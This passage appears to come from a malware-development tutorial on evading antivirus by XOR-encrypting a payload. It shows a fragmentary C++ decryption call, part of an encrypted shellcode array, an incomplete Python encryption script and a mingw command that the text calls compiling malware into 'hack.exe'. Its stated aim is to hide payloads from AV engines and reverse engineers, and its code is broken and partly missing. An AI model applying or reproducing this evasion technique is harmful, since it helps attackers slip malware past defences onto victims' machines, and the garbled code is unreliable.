04 Evasion Encryption
04 Evasion Encryption
For this first we must encrypt our payload. Why we want to encrypt our payload? The basic purpose of
doing this to hide you payload from someone like AV engine or reverse engineer. So that reverse
engineer cannot easily identify your payload.
The purpose of encryption is the transform data in order to keep it secret from others. For simplicity,
we use XOR encryption for our case.
Let’s take a look at how to use XOR to encrypt and decrypt our payload.
//....
// decrypt payload
deXOR((char*)payload, sizeof(payload), secretKey, sizeof(secretKey));
// etc...
0xee, 0xa2, 0x9a, 0x71, 0x9c, 0x8d, 0x9a, 0x3c, 0x70, 0xa6, 0x2b, 0xf1,
0xa1, 0x5c, 0xb0 };
For that create simple python script which encrypt payload and replace it in our C++ template:
import sys
import os
import hashlib
import string
for i in range(len(data)):
current = data[i]
current_key = key[i % len(key)]
ordd = lambda x: x if isinstance(x, int) else ord(x)
output_str += chr(ordd(current) ^ ord(current_key))
return output_str
## encrypting
def xor_encrypt(data, key):
ciphertext = xor(data, key)
ciphertext = '{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in
ciphertext) + ' };'
print (ciphertext)
return ciphertext, key
python3 xor.py
Compile malware:
x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-
w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -
fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -
fpermissive
.\hack.exe